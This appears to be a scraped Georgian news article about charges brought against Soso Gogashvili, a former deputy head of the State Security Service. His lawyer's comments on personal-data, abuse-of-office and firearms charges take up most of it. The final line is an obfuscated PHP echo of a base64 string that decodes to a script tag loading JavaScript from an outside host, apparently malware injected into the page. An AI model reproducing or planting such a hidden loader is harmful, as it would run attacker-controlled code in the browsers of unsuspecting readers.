celsiusi
ავერსი შნაიდერი
სახელმწიფო უსაფრთხოების სამსახურის უფროსის ყოფილი მოადგილეს, სოსო გოგაშვილს ბრალდება ოფიციალურად წარუდგინეს. 
 
როგორც ადვოკატმა რამაზ ჩინჩალაძემ სუსის დატოვების შემდეგ თქვა, გამოძიება სამი მუხლით - იარაღის უკანონო შეძენა-შენახვა-ტარების და პირადი ცხოვრების ამსახველი საიდუმლოების ან პერსონალური მონაცემების ხელყოფის მუხლით დაიწყო.
 
პერსონალური მონაცემების გასაჯაროება, როგორც ეს ბრალდებაშია მითითებული, შეეხება 2015-18 წლებში ბატონი სოსო გოგაშვილის სახელმწიფო უსაფრთხოების სამსახურში მუშაობის პერიოდს და თითქოს მას ხელი მიუწვდებოდა როგორც სახელმწიფო საიდუმლოების შემცველ ინფორმაციაზე, ასევე პერსონალურ მონაცემებზე და როგორც დადგენილებაში პირის ბრალდების შესახებ, მას ედავებიან 2021 წლის თებერვლის თვეში გავრცელდა ორ პირთან მიმართებაში პერსონალური მონაცემები და სწორედ ეს გახლავთ ერთ-ერთი ეპიზოდი. ჯერჯერობით ჩემთვის უცნობია რომელი ორი პიროვნების პერსონალური მონაცემების გავრცელებაზეა საუბარი. საქმის მასალები არ გადმომცემია და დამიკავშირდება რამდენიმე საათში გამომძიებელი და დღეს ალბათ მოგვიანებით ოფიციალურ მასალებსაც ავიღებ, - ამბობს ადვოკატი. 
 
მისივე თქმით, გამოძიების მეორე ეპიზოდი სამსახურეობრივი უფლებამოსილების გადამეტებაა. 
 
ესეც შეეხება 2015-18 წლებში სახელმწიფო საიდუმლოების შემცველ ინფორმაციას და ასევე პირად და პერსონალურ მონაცემებს, თითქოს სოსო გოგაშვილმა ეს მონაცემები უკანონოდ გამოიტანა სამსახურიდან, მაგრამ თუ ეს მონაცემები იყო სახელმწიფოს საიდუმლოება, მაშინ უკანონო რატომ იყო, კითხვის ნიშნები ჩნდება ამ კუთხით და იმედია, საქმის მასალებს როცა გავეცნობი, უფრო მეტი ნათელი მოეფინება, - ამბობს ჩინჩალაძე.
 
მესამე ეპიზოდი კი, მისი თქმით, იარაღის უკანონო შეძენა-შენახვას ეხება:
 
მესამე ეპიზოდი გახლავთ ცეცხლსასროლი იარაღების უკანონო შეძენა-შენახვის ბრალდება და აქაც ძალიან ბევრი კითხვის ნიშანი და აბსურდული რაღაცები ჩნდება. კერძოდ, 5 ცეცხლსასროლი იარაღის უკანონო შეძენა-შენახვას ედავებიან ბატონ სოსო გოგაშვილს. ამ 5 ცეცხლსასროლი იარაღიდან 2 არის სწორედ ის იარაღები, რაზეც ოჯახის წევრები, ნათესავები და უშუალოდ სოსო გოგაშვილიც მიუთითებს, რომ მოხდა ამ იარაღების ჩადება. ხოლო 3 ცეცხლსასროლი იარაღი რისი უკანონო შეძენა-შენახვაზეც ბრალი აქვს წარდგენილი ეკუთვნის მის დაცვის თანამშრომლებს. გაფორმებულია და რეგისტრირებულია დაცვის თანამშრომლებზე, - ამბობს ადვოკატი. 
 
ცნობისთვის, სოსო გოგაშვილი გუშინ საკუთარ სახლში სპეცოპერაციის შედეგად დააკავეს. სუს-ში განაცხადეს, რომ გოგაშვილის დაკავება "მიმდინარე სისხლის სამართლის საქმეს უკავშირდება და არა ახალს". 
619
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");